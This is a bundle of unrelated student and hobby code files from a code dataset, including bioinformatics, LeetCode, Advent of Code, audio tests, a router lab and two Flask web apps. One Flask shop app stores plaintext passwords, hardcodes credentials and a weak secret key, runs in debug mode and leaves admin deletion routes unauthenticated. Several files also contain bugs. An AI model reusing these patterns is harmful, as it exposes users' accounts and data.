names.\r\nGENE_NAME1 = \"NM_%d%08d\"\r\nGENE_NAME2 = \"NM_%d%05d\"\r\n\r\n\r\ndef get_args(raw_args):\r\n parser = common.default_parser(\r\n \"Produces a fake refGene file for an artificial genome.\")\r\n parser.add_argument(\r\n \"-r\", \"--refgene\", type=str, default=consts.REFGENE_FNAME,\r\n help=\"Name of output refGene file, with a single %%d for chr number\")\r\n parser.add_argument(\r\n \"-t\", \"--target_len\", type=int, default=consts.TARGET_LEN,\r\n help=\"Length of target sequences\")\r\n\r\n return parser.parse_args(raw_args)\r\n\r\n\r\ndef write_refgene(chrom, target_len, fd_out):\r\n \"\"\"Writes the contents of the refGene file.\r\n\r\n Args:\r\n chrom: A Chromosome instance.\r\n target_len: The length of target sequences.\r\n fd_out: A file descriptor for the output file.\r\n \"\"\"\r\n chr_name = chrom.get_name()\r\n # Reads the chromosome sequence.\r\n with open(chrom.get_path('txt'), 'r') as chr_file:\r\n genome = chr_file.read()\r\n\r\n # Identifies all the target sequences in the chromosome.\r\n matcher = re.compile(\r\n TARGET_PATTERN % (target_len, consts.NUM_N_BETWEEN_GUIDES))\r\n\r\n # Adds an entry for each target.\r\n for i, m in enumerate(matcher.finditer(genome)):\r\n idx = i+1\r\n gene_name1 = GENE_NAME1 % (chrom.num, idx)\r\n gene_name2 = GENE_NAME2 % (chrom.num, idx)\r\n strand = '+'\r\n start = m.start()\r\n end = start + target_len\r\n line = REFGENE_LINE.format(**locals())\r\n fd_out.write(line)\r\n\r\n\r\ndef main(raw_args=None):\r\n \"\"\"Produces a fake refGene file for an artificial genome.\r\n\r\n For command line help, run with the '-h' flag.\r\n\r\n Writes:\r\n A refGene file.\r\n \"\"\"\r\n args = get_args(raw_args)\r\n dataset = DATASETS[args.dataset]\r\n dataset.set_work_dir(args.path)\r\n chrom = dataset.get_chr(args.chr)\r\n\r\n out_path = chrom.get_refgene(args.refgene)\r\n with open(out_path, 'w') as fd_out:\r\n write_refgene(chrom, args.target_len, fd_out)\r\n\r\n\r\nif __name__ == '__main__':\r\n 
main()\r\n","repo_name":"sivan-bhaim/CrisprMethodCombinations","sub_path":"work_dir/scripts/prep/fake_refgene.py","file_name":"fake_refgene.py","file_ext":"py","file_size_in_byte":2503,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"39279520230","text":"class LockingTree:\n\n def __init__(self, parent: List[int]):\n self.parent = parent\n self.graph = defaultdict(list)\n self.lock_history = [None] * len(parent)\n\n for child, p in enumerate(parent):\n self.graph[p].append(child)\n\n def lock(self, num: int, user: int) -> bool:\n if self.lock_history[num] == None:\n self.lock_history[num] = user\n return True\n return False\n \n\n def unlock(self, num: int, user: int) -> bool:\n if self.lock_history[num] == user:\n self.lock_history[num] = None\n return True\n return False\n\n\n def locked_ancestor_exists(self, node: int) -> bool:\n parent = self.parent[node]\n \n while parent != -1:\n if self.lock_history[parent] != None:\n return True\n parent = self.parent[parent]\n\n return False\n\n def locked_descendant_exists(self, node: int) -> bool:\n if self.lock_history[node] != None:\n return True\n\n for child in self.graph[node]:\n if self.locked_descendant_exists(child):\n return True \n\n return False\n\n def unlock_descendants(self, node: int) -> None:\n self.lock_history[node] = None\n for child in self.graph[node]:\n self.unlock_descendants(child)\n\n def upgrade(self, num: int, user: int) -> bool:\n if self.lock_history[num] != None:\n return False\n \n for child in self.graph[num]:\n if self.locked_descendant_exists(child):\n break\n else:\n return False\n \n if self.locked_ancestor_exists(num):\n return False\n\n self.unlock_descendants(num)\n self.lock_history[num] = user\n\n return True\n\n\n \n\n\n# Your LockingTree object will be instantiated and called as such:\n# obj = LockingTree(parent)\n# param_1 = obj.lock(num,user)\n# param_2 = obj.unlock(num,user)\n# param_3 = 
obj.upgrade(num,user)","repo_name":"Son-OfAnton/Leetcode","sub_path":"1993-operations-on-tree/1993-operations-on-tree.py","file_name":"1993-operations-on-tree.py","file_ext":"py","file_size_in_byte":2018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"71429925799","text":"from flask import Flask, render_template, request, redirect, url_for, session,flash\nfrom flask_mysqldb import MySQL\nfrom flask_wtf import FlaskForm\nfrom wtforms import *\nfrom flask_uploads import *\nfrom werkzeug.utils import secure_filename\nimport MySQLdb.cursors\nimport re\n\nUPLOAD_FOLDER = '/static/image'\nALLOWED_EXTENSIONS = {'txt', 'pdf', 'png', 'jpg', 'jpeg', 'gif'}\n\napp = Flask(__name__)\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n\n\napp.secret_key = 'secret key'\n\n\napp.config['MYSQL_HOST'] = 'localhost'\napp.config['MYSQL_USER'] = 'gordon'\napp.config['MYSQL_PASSWORD'] = '123'\napp.config['MYSQL_DB'] = 'gamefun'\n\n\nmysql = MySQL(app)\n\n\n\nclass UpdateProductForm(Form):\n productName = StringField('', [validators.length(min=3, max=100)],\n render_kw={'placeholder': 'Product Name'})\n productDetail = StringField('', [validators.length(min=3, max=500)],\n render_kw={'placeholder': 'Detail'})\n productPrice = FloatField('', [validators.InputRequired()], \n render_kw={'placeholder': 'Price'})\n productCompany = StringField('', [validators.length(min=3, max=100)], \n render_kw={'placeholder': 'Product Company'})\n productPhoto = StringField('', [validators.length(min=3, max=100)], \n render_kw={'placeholder': 'Product Link'})\n\n \n\n\n@app.route('/')\ndef index():\n\treturn render_template('MainPage.html')\n\n\n@app.route('/news')\ndef news():\n\treturn render_template('news.html')\n\n@app.route('/product')\ndef product():\n\n\tproducttypea = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n\tgtype = 'PS4'\n\tproducttypea.execute(\"SELECT * FROM Products WHERE productCompany = %s ORDER BY RAND()\", 
(gtype,))\n\tPS4 = producttypea.fetchall()\n\n\tproducttypeb = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n\tgtype = 'NS'\n\tproducttypeb.execute(\"SELECT * FROM Products WHERE productCompany = %s ORDER BY RAND()\", (gtype,))\n\tNS = producttypeb.fetchall()\n\n \n\treturn render_template('product.html', PS4 =PS4, NS=NS)\n\n@app.route('/productDetail', methods=[\"POST\",\"GET\"])\ndef proDetail():\n if 'productID' in request.args:\n productID = request.args['productID']\n \n cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n cursor.execute('SELECT * FROM Products WHERE productID = %s',(productID,))\n mysql.connection.commit()\n detail = cursor.fetchall()\n\n return render_template('proDetail.html', detail = detail)\n return render_template('proDetail.html')\n\n\n@app.route('/order', methods=['POST',\"GET\"])\ndef order():\n if 'loggedin' in session:\n if 'productID' in request.args:\n productID = request.args['productID']\n \n cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n cursor.execute('SELECT * FROM Products WHERE productID = %s',(productID,))\n mysql.connection.commit()\n detail = cursor.fetchall()\n\n return render_template('order.html', detail = detail)\n return render_template('order.html')\n else:\n flash('Please login your account')\n return render_template('Login.html')\n\n\n@app.route('/confirmOrder',methods=[\"POST\",\"GET\"])\ndef confirmOrder():\n\n if request.method == 'POST' and 'orderName' in request.form and 'ProductID' in request.form and 'orderAddress' in request.form and 'orderPhone' in request.form:\n \n orderName = request.form['orderName']\n ProductID = request.form['ProductID']\n orderAddress = request.form['orderAddress']\n orderPhone = request.form['orderPhone']\n orderEmail = request.form['orderEmail']\n \n \n cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor) \n submit = cursor.execute('INSERT INTO orderlist VALUES (NULL, %s, %s,%s, %s, %s)', (orderName,ProductID,orderAddress,orderPhone, 
orderEmail))\n mysql.connection.commit()\n \n if submit:\n flash('Order Submitted', 'success')\n return render_template('MainPage.html', submit = submit )\n \n else:\n flash('Order Not Submit', 'danger') \n return render_template('order.html', submit = submit )\n\n return render_template('confirmOrder.html')\n \n \n \n \n \n \n\n@app.route(\"/vieworder\" , methods=['GET', 'POST'])\ndef viewallorder():\n cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n cursor.execute(\"SELECT * FROM orderlist \")\n viewallorder = cursor.fetchall()\n return render_template ('vieworder.html' ,viewallorder = viewallorder)\n\n@app.route(\"/deleteorder\" , methods=['GET', 'POST'])\ndef deleteproduct():\n if 'orderID' in request.args:\n orderID = request.args['orderID']\n cursor = mysql.connection.cursor()\n deleted = cursor.execute(\"DELETE FROM orderlist where orderID=%s\", (orderID,))\n mysql.connection.commit()\n if deleted:\n flash('Order has been deleted')\n return render_template('vieworder.html')\n \n return redirect(url_for('vieworder.html'))\n\n\n \n\n@app.route('/CustomerService', methods=['GET', 'POST'])\ndef customerService():\n\n\tif request.method =='POST':\n\t\tname = request.form['name']\n\t\tphoneNumber = request.form['phonenumber']\n\t\temail = request.form['email']\n\t\tproblemD = request.form['question']\n\t\tcursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n\t\tcursor.execute('INSERT INTO questions VALUES (NULL, %s, %s,%s, %s)', (name,phoneNumber,email,problemD))\n\t\tmysql.connection.commit()\n\t\treturn render_template('FormSent.html')\n\telse:\n\t\treturn render_template('CustSer.html')\n\n@app.route('/About')\ndef About():\n\treturn render_template('About.html')\n\n@app.route('/profile')\ndef profile():\n \n if 'loggedin' in session:\n \n cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n cursor.execute('SELECT * FROM users WHERE id = %s', (session['id'],))\n user = cursor.fetchone()\n \n return 
render_template('profile.html', users=user)\n \n return redirect(url_for('login'))\n\n@app.route('/adminprofile')\ndef adminprofile():\n\n\tif 'adminloggedin' in session:\n\n\t\tcursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n\t\tcursor.execute('SELECT * FROM admin WHERE adminID = %s', (session['adminID'],))\n\t\tadmin = cursor.fetchone()\n\n\t\treturn render_template('adminProfile.html')\n\treturn redirect(url_for('adminlogin.html'))\n\n\n@app.route(\"/listalluser\" , methods=['GET', 'POST'])\ndef listalluser():\n cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n cursor.execute(\"SELECT * FROM users \")\n listalluser = cursor.fetchall()\n return render_template ('listuser.html' ,listalluser = listalluser)\n\n@app.route(\"/listallproduct\" , methods=['GET', 'POST'])\ndef listallproduct():\n cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n cursor.execute(\"SELECT * FROM Products\")\n listallproduct = cursor.fetchall()\n return render_template('listallproduct.html', listallproduct = listallproduct)\n\n\n@app.route(\"/editproduct\" , methods=['GET', 'POST'])\ndef editproduct():\n if 'productID' in request.args:\n form = UpdateProductForm(request.form)\n productID = request.args['productID']\n cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n cursor.execute(\"SELECT * FROM Products WHERE productID=%s\", (productID))\n result = cursor.fetchone()\n\n if request.method == 'POST' and 'productName' in request.form and 'productDetail' in request.form and 'productPrice' in request.form and 'productCompany' in request.form and 'productPhoto' in request.form:\n productName = form.productName.data\n productDetail = form.productDetail.data\n productPrice = form.productPrice.data\n productCompany = form.productCompany.data\n productPhoto = form.productPhoto.data\n\n \n cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n update = cursor.execute(\"UPDATE Products SET productName=%s,productDetail=%s, productPrice=%s, 
productCompany=%s , productPhoto=%s WHERE productID=%s\",\n ( productName,productDetail,productPrice,productCompany,productPhoto,productID))\n mysql.connection.commit()\n\n if update:\n flash('info updated', 'success')\n return render_template('editproduct.html', result= result, form=form , )\n else:\n flash('info not updated', 'danger')\n return render_template('editproduct.html',result= result, form=form, )\n\n return render_template('editproduct.html', result= result, form=form, )\n return render_template('editproduct.html')\n\n@app.route(\"/deleteproduct\" , methods=['GET', 'POST'])\ndef deleteP():\n if 'productID' in request.args:\n productID = request.args['productID']\n cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n cursor.execute(\"DELETE FROM Products where productID = %s\", (productID,))\n mysql.connection.commit()\n if deleted:\n flash('Product has been deleted')\n return render_template('listallproduct.html' ,deleted = deleted)\n \n return render_template('listallproduct.html')\n\n\n@app.route(\"/productUpload\" , methods=['GET', 'POST']) \ndef uploadproduct():\n \n if request.method == 'POST' and 'productName' in request.form and 'productDetail' in request.form and 'productPrice' in request.form and 'productCompany' in request.form and 'productPhoto' in request.form : \n productName = request.form['productName']\n productDetail = request.form['productDetail']\n productPrice = request.form['productPrice']\n productCompany = request.form['productCompany']\n productPhoto = request.form['productPhoto']\n cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n cursor.execute(\"INSERT INTO Products ( productName, productDetail, productPrice, productCompany, productPhoto) VALUES(%s, %s, %s, %s, %s)\",( productName, productDetail, productPrice, productCompany, productPhoto))\n mysql.connection.commit()\n \n \n return render_template ('uploadproduct.html')\n\n@app.route(\"/viewquestion\" , methods=['GET', 'POST'])\ndef viewquestion():\n 
cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n cursor.execute(\"SELECT * FROM questions\")\n viewquestion = cursor.fetchall()\n return render_template('viewquestion.html', viewquestion = viewquestion)\n\n@app.route(\"/deletequestion\" , methods=['GET', 'POST'])\ndef deletequestion():\n if 'questionID' in request.args:\n questionID = request.args['questionID']\n cursor = mysql.connection.cursor()\n deleted = cursor.execute(\"DELETE FROM questions where questionID=%s\", (questionID,))\n mysql.connection.commit()\n if deleted:\n flash('question has been deleted')\n return render_template('viewquestion.html', deleted = deleted)\n return render_template('viewquestion.html')\n\n\n@app.route('/adminhome')\ndef adminhome():\n\treturn render_template('adminHome.html')\n\n\n\n@app.route('/adminLogin' , methods=['GET', 'POST'])\ndef adminLogin():\n\tmsg =''\n\tif request.method =='POST' and 'adminName' in request.form and 'adminPassword' in request.form:\n\n\t\tadminName = request.form['adminName']\n\t\tadminPassword = request.form['adminPassword']\n\t\tcursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n\t\tcursor.execute('SELECT * FROM admin WHERE adminName = %s AND adminPassword= %s', (adminName, adminPassword))\n\n\t\tadmin = cursor.fetchone()\n\t\tif admin:\n\t\t\tsession['adminloggedin'] = True\n\t\t\tsession['adminID'] = admin['adminID']\n\t\t\tsession['adminName'] = admin['adminName']\n\t\t\tsession['adminPassword'] = admin['adminPassword']\n\t\t\tsession['adminEmail'] = admin['adminEmail']\n\n\t\t\treturn render_template('adminHome.html')\n\t\telse:\n\t\t\tmsg = 'Incorrect username/password'\n\n\treturn render_template('adminlogin.html')\n\n@app.route('/gamefun/adminlogout')\ndef adminlogout():\n \n session.pop('adminloggedin', None)\n session.pop('adminID', None)\n session.pop('adminName', None)\n\n return redirect(url_for('adminhome'))\n\n\n\n@app.route('/Login/', methods=['GET', 'POST'])\ndef login():\n \n msg = ''\n \n if request.method 
== 'POST' and 'username' in request.form and 'password' in request.form:\n \n username = request.form['username']\n password = request.form['password']\n \n cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n cursor.execute('SELECT * FROM users WHERE username = %s AND password = %s', (username, password,))\n \n user = cursor.fetchone()\n \n if user:\n \n session['loggedin'] = True\n session['id'] = user['id']\n session['username'] = user['username']\n \n return render_template('LoginS.html')\n else:\n \n msg = 'Incorrect username/password!'\n \n return render_template('Login.html', msg=msg)\n\n \n@app.route('/gamefun/logout')\ndef logout():\n \n session.pop('loggedin', None)\n session.pop('id', None)\n session.pop('username', None)\n \n return redirect(url_for('login'))\n\n\n@app.route('/register', methods=['GET', 'POST'])\ndef register():\n \n msg = ''\n \n if request.method == 'POST' and 'username' in request.form and 'password' in request.form and 'email' in request.form:\n \n username = request.form['username']\n password = request.form['password']\n email = request.form['email']\n \n cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n cursor.execute('SELECT * FROM users WHERE username = %s', (username,))\n user = cursor.fetchone()\n \n if user:\n msg = 'Account already exists!'\n elif not re.match(r'[^@]+@[^@]+\\.[^@]+', email):\n msg = 'Invalid email address!'\n elif not re.match(r'[A-Za-z0-9]+', username):\n msg = 'Username must contain only characters and numbers!'\n elif not username or not password or not email:\n msg = 'Please fill out the form!'\n else:\n \n cursor.execute('INSERT INTO users VALUES (NULL, %s, %s, %s)', (username, password, email,))\n mysql.connection.commit()\n return render_template('RegistS.html')\n elif request.method == 'POST':\n \n msg = 'Please fill out the form!'\n \n return render_template('Register.html', msg=msg)\n\n\n\n\n\n\nif __name__ == 
'__main__':\n\tapp.run(debug=True)","repo_name":"tsunwang9455/205CDE","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":14733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"70919851240","text":"filename = \"day_2_input.txt\"\ntotal_score_1 = 0\ntotal_score_2 = 0\n\ndef round_score_1(line):\n opp, self = line.split()\n shape_score = ord(self) - ord(\"X\") + 1\n winner_score = ((ord(self) - ord(opp)) % 3 == 0) * 6 + ((ord(self) - ord(opp)) % 3 == 2) * 3\n return shape_score + winner_score\n\ndef round_score_2(line):\n opp, result = line.split()\n shape_score = ((ord(opp) + ord(result) - 128) % 3 == 0) * 2 + ((ord(opp) + ord(result) - 128) % 3 == 1) * 3 + ((ord(opp) + ord(result) - 128) % 3 == 2) * 1\n winner_score = (ord(result) - ord(\"X\")) * 3\n return shape_score + winner_score\n\nwith open(filename) as f:\n for line in f:\n if not len(line.strip()) == 0:\n total_score_1 += round_score_1(line)\n total_score_2 += round_score_2(line)\n\nprint(total_score_1, total_score_2)","repo_name":"neunzehnhundert97/AoC2022","sub_path":"Python/02.py","file_name":"02.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"41952605510","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nTests the TSM procedures on real data.\n\"\"\"\n\nimport os\nimport shutil\nimport pytest\n\nfrom audiotsm import ola, wsola, phasevocoder, PhaseLocking\nfrom audiotsm.io.wav import WavReader, WavWriter\nfrom audiotsm.io.array import ArrayWriter\n\nEXAMPLES_DIR = os.path.join(\"build\", \"ghpages\", \"examples\")\n\n\ndef create_tsm(name, channels, speed):\n \"\"\"Create a TSM object given the method name and its parameters.\"\"\"\n if name == \"ola\":\n return ola(channels, speed)\n if name == \"wsola\":\n return wsola(channels, speed)\n if name == \"phasevocoder\":\n return phasevocoder(channels, speed, 
phase_locking=PhaseLocking.NONE)\n if name == \"phasevocoder_identity\":\n return phasevocoder(channels, speed,\n phase_locking=PhaseLocking.IDENTITY)\n\n raise ValueError(\"unknown TSM method: {}\".format(name))\n\n\ndef test_data(data_file, speed, tsm_name, save):\n \"\"\"Test the TSM procedures on real data.\"\"\"\n reader = None\n writer = None\n\n try:\n # Create the reader\n reader = WavReader(data_file)\n\n # Create the writer\n if save:\n # pylint: disable=no-member\n rel_path = os.path.relpath(data_file, pytest.DATA_DIR)\n # pylint: enable=no-member\n\n # Copy original file to \"orig\" directory\n orig_file = os.path.join(EXAMPLES_DIR, \"orig\", rel_path)\n orig_dir = os.path.dirname(orig_file)\n if not os.path.isdir(orig_dir):\n os.makedirs(orig_dir)\n if not os.path.isfile(orig_file):\n shutil.copy2(data_file, orig_file)\n\n # Generate output file path\n speed_dir = \"speed-{:.2f}\".format(speed)\n name = os.path.splitext(rel_path)[0]\n output_name = \"{}_{}.wav\".format(name, tsm_name)\n output_file = os.path.join(EXAMPLES_DIR, speed_dir, output_name)\n output_dir = os.path.dirname(output_file)\n if not os.path.isdir(output_dir):\n os.makedirs(output_dir)\n\n writer = WavWriter(output_file, reader.channels, reader.samplerate)\n else:\n writer = ArrayWriter(reader.channels)\n\n # Create and run the TSM\n tsm = create_tsm(tsm_name, reader.channels, speed)\n tsm.run(reader, writer)\n\n finally:\n # Close files\n if reader:\n reader.close()\n if save and writer:\n writer.close()\n","repo_name":"Muges/audiotsm","sub_path":"tests/integration/test_data.py","file_name":"test_data.py","file_ext":"py","file_size_in_byte":2460,"program_lang":"python","lang":"en","doc_type":"code","stars":77,"dataset":"github-code","pt":"18"} +{"seq_id":"31238254730","text":"#!/usr/bin/env python3\nimport random\nimport os.path\ntries = 0;\nn = random.randint(0,100)\nprint(n)\noldTries = [] \ndef playAgain():\n global tries\n global n\n tries=0\n n = random.randint(0,100)\n 
print(n)\n \n oldTries.clear() \ndef playGame():\n global tries\n x = -1\n while True:\n if(tries < 10):\n try:\n x = eval(input('Enter a number between 0 and 100'))\n except:\n print(\"invalid choice\")\n if (x<0 or x > 100):\n print(\"please enter only numbers between 0 and 10\")\n else:\n if(x==n):\n print(\"Congratulation your answer is correct\")\n saveResult(\"won\")\n playAgain();\n \n elif x in oldTries:\n print(\" you have tried this before\") \n elif(x>n):\n print(\"a smaller number\")\n oldTries.append(x)\n tries = tries+1\n elif(x\")\nclass Item(MethodView):\n ## this is the default code of response\n ##and will pass whatever be the return\n ##to ItemSchmea\n @jwt_required()\n @blp.response(200, ItemSchema)\n def get(self, item_id):\n ##this i only avaliable with flask sqlarchemy, with vanilla alchemy we will have to find other way\n ##get or 404 use the primary key to search\n item = ItemModel.query.get_or_404(item_id)\n return item\n\n @jwt_required()\n def delete(self, item_id):\n jwt = get_jwt()\n if not jwt.get(\"is_admin\"):\n abort(401, message= \"Admin privilege required\")\n item = ItemModel.query.get_or_404(item_id)\n db.session.delete(item)\n db.session.commit()\n return {\"message\":\"Item has been delted\"}, 200\n \n @jwt_required()\n ## this is all the implementation needed to \n ##implement security via jwt to a spcifid endpoint\n ## as defaul on header must go \n ## Autorization Bearer $JWT\n ##Bearer means \"Portador\"\n ##Bearer is like a convention\n @blp.arguments(ItemUpdateSchema)\n ##To inject arguments into a view function, use the Blueprint.arguments decorator. 
It allows to specify a Schema to deserialize and validate the parameters.\n##When processing a request, the input data is deserialized, validated, and injected in the view function.\n ##orden of decorator matter\n @blp.response(200, ItemSchema)\n ##put request should have the same state at the end independly if we receive one o ten time the request\n ##ieg if a user push multiple times a button of send by mistake two times the same request\n def put(self,item_data, item_id ):\n item = ItemModel.query.get(item_id)\n ## item will be true if item exists \n if item:\n item.price = item_data[\"price\"]\n item.name = item_data[\"name\"]\n else:\n item = ItemModel(id=item_id, **item_data)\n\n db.session.add(item)\n db.session.commit()\n\n raise NotImplementedError(\"Updating an item is not implemented.\")\n\n @blp.route(\"/item\")\n class ItemList(MethodView):\n ##with many=True it auto convert response into a list\n @blp.response(200, ItemSchema(many=True))\n def get(self):\n return ItemModel.query.all()\n\n ##this will require a jwt of type fresh to perform the operation\n @jwt_required(fresh=True)\n\n ##with this we pass to validation\n ##with marshmallow\n @blp.arguments(ItemSchema)\n ## here the second argument is the json\n ##that pass the validation\n @blp.response(201, ItemSchema)\n def post(self, item_data):\n ##** allow us to unpack all arguments paxsed as named arguments\n item = ItemModel(**item_data)\n ##when we create a item id field will hav eno value\n ##until we insert it on db\n\n try:\n ##add dont writte direct into de db but stage data\n db.session.add(item)\n ##commit writte in db\n db.session.commit()\n except SQLAlchemyError:\n abort(500, message= \"An error ocurred while inseting the item.\")\n \n return item","repo_name":"Ryss-D/flask","sub_path":"restAPI/resources/item.py","file_name":"item.py","file_ext":"py","file_size_in_byte":3980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} 
+{"seq_id":"40774235555","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Author : Rock Wayne \n# @Created : 2020-07-29 17:44:41\n# @Last Modified : 2020-07-29 17:44:41\n# @Mail : lostlorder@gmail.com\n# @Version : alpha-1.0\n\n\"\"\"\n# 给定一幅由黑色像素和白色像素组成的图像, 与一个正整数N, 找到位于某行 R 和某列 C 中且符合下列规则的黑色像素的数量: \n# \n# \n# 行R 和列C都恰好包括N个黑色像素。 \n# 列C中所有黑色像素所在的行必须和行R完全相同。 \n# \n# \n# 图像由一个由‘B’和‘W’组成二维字符数组表示, ‘B’和‘W’分别代表黑色像素和白色像素。 \n# \n# 示例: \n# \n# 输入: \n# [['W', 'B', 'W', 'B', 'B', 'W'], \n# ['W', 'B', 'W', 'B', 'B', 'W'], \n# ['W', 'B', 'W', 'B', 'B', 'W'], \n# ['W', 'W', 'B', 'W', 'B', 'W']] \n# \n# N = 3\n# 输出: 6\n# 解析: 所有粗体的'B'都是我们所求的像素(第1列和第3列的所有'B').\n# 0 1 2 3 4 5 列号 \n# \n# 0 [['W', 'B', 'W', 'B', 'B', 'W'], \n# 1 ['W', 'B', 'W', 'B', 'B', 'W'], \n# 2 ['W', 'B', 'W', 'B', 'B', 'W'], \n# 3 ['W', 'W', 'B', 'W', 'B', 'W']] \n# 行号\n# \n# 以R = 0行和C = 1列的'B'为例:\n# 规则 1,R = 0行和C = 1列都恰好有N = 3个黑色像素. \n# 规则 2,在C = 1列的黑色像素分别位于0,1和2行。它们都和R = 0行完全相同。\n# \n# \n# \n# \n# \n# 注意: \n# \n# \n# 输入二维数组行和列的范围是 [1,200]。 \n# \n# \n# \n# Related Topics 深度优先搜索 数组 \n# 👍 8 👎 0\n\n\"\"\"\n\nimport collections\nfrom typing import List\n\nimport pytest\n\n\n# leetcode submit region begin(Prohibit modification and deletion)\nclass Solution:\n def findBlackPixel(self, picture: List[List[str]], N: int) -> int:\n \"\"\"题意太费解\"\"\"\n R, C = len(picture), len(picture[0])\n rows, cols = [0] * R, [0] * C\n lookup = collections.defaultdict(int)\n for i in range(R):\n for j in range(C):\n if picture[i][j] == 'B':\n rows[i] += 1\n cols[j] += 1\n lookup[tuple(picture[i])] += 1\n # print(rows,cols,lookup)\n result = 0\n for i in range(R):\n if rows[i] == N and lookup[tuple(picture[i])] == N:\n for j in range(C):\n result += picture[i][j] == 'B' and cols[j] == N\n return result\n\n\n# leetcode submit region end(Prohibit modification and deletion)\n\n\n@pytest.mark.parametrize(\"kw,expected\", [\n [dict(\n picture=[['W', 'B', 'W', 'B', 'B', 'W'],\n ['W', 'B', 'W', 'B', 'B', 'W'],\n ['W', 'B', 'W', 'B', 
'B', 'W'],\n ['W', 'W', 'B', 'W', 'B', 'W']],\n N=3\n ), 6],\n\n])\ndef test_solutions(kw, expected):\n assert Solution().findBlackPixel(**kw) == expected\n\n\nif __name__ == '__main__':\n pytest.main([\"-q\", \"--color=yes\", \"--capture=no\", __file__])\n","repo_name":"Wang-Yann/LeetCodeMe","sub_path":"python/_0501_1000/0533_lonely-pixel-ii.py","file_name":"0533_lonely-pixel-ii.py","file_ext":"py","file_size_in_byte":3041,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"30036481944","text":"#!/usr/bin/env python3\n\n'''\nBasic IPv4 router (static routing) in Python.\n'''\n\nimport sys\nimport os\nimport time\nfrom switchyard.lib.userlib import *\n\n\n\nclass Router(object):\n def __init__(self, net):\n self.net = net\n # other initialization stuff here\n self.interfaces = net.interfaces() \n self.ip_list=[intf.ipaddr for intf in self.interfaces]\n self.mac_list=[intf.ethaddr for intf in self.interfaces]\n self.arp_table={}\n \n def router_main(self): \n '''\n Main method for router; we stay in a loop in this method, receiving\n packets until the end of time.\n '''\n while True:\n gotpkt = True\n try:\n timestamp,dev,pkt = self.net.recv_packet(timeout=1.0)\n except NoPackets:\n log_debug(\"No packets available in recv_packet\")\n gotpkt = False\n except Shutdown:\n log_debug(\"Got shutdown signal\")\n break\n \n if gotpkt:\n log_debug(\"Got a packet: {}\".format(str(pkt)))\n log_info(\"Got a packet: {}\".format(str(pkt)))\n arp = pkt.get_header(Arp)\n if arp is None:\n log_info(\"Not arp Packet\")\n else:\n log_info(\"operation kind {}\".format(str(arp.operation)))\n self.arp_table[arp.senderprotoaddr]=arp.senderhwaddr\n if arp.operation == 1:\n log_info(\"recive arp requests\")\n index=-1\n for i in range(len(self.ip_list)):\n if self.ip_list[i]==arp.targetprotoaddr:\n index=i\n break\n if index != -1:\n log_info(\"match the packet\")\n answer=create_ip_arp_reply(self.mac_list[index], arp.senderhwaddr, 
self.ip_list[index],arp.senderprotoaddr)\n self.net.send_packet(dev, answer)\n log_info(\"send answer: {}\".format(str(answer)))\n else:\n log_info(\"no match\")\n else:\n if arp.operation == 2:\n log_info(\"recive arp reply\")\n self.arp_table[arp.targetprotoaddr]=arp.targethwaddr\n else:\n log_info(\"recive unk arp\")\n log_info(\"Table Shown as follows\")\n for (k,v) in self.arp_table.items(): \n print (\"%s \" % k,v )\n \n \n \n\n\n\n\n\ndef main(net):\n '''\n Main entry point for router. Just create Router\n object and get it going.\n '''\n r = Router(net)\n r.router_main()\n net.shutdown()\n","repo_name":"Ricardokevins/NJU_ComputerNetWork","sub_path":"switchyard-master/lab_3/myrouter.py","file_name":"myrouter.py","file_ext":"py","file_size_in_byte":2933,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"44"} +{"seq_id":"28584161535","text":"# Drzewo BST T reprezentowane jest przez obiekty klasy Node:\n\nclass Node:\n def __init__(self):\n self.left = None # lewe poddrzewo\n self.right = None # prawe poddrzewo\n self.parent = None # rodzic drzewa jeśli istnieje\n self.value = None # przechowywana wartość\n\n# Proszę zaimplementować funkcję:\n\n# def ConvertTree(T):\n# ...\n\n# która przekształca drzewo T na drzewo o minimalnej wysokości, w którym węzły spełniają warunek:\n# największy element na danym poziomie jest mniejszy od najmniejszego elementu na kolejnym poziomie.\n# Funkcja zwraca korzeń nowego drzewa. Poziomy numerujemy od korzenia do liści. Funkcja powinna być\n# możliwie jak najszybsza oraz - jako kryterium drugiego rzędu - używać jak najmniejszej ilości pamięci\n# (poza pamięcią już wykorzystaną na reprezentacje drzewa). 
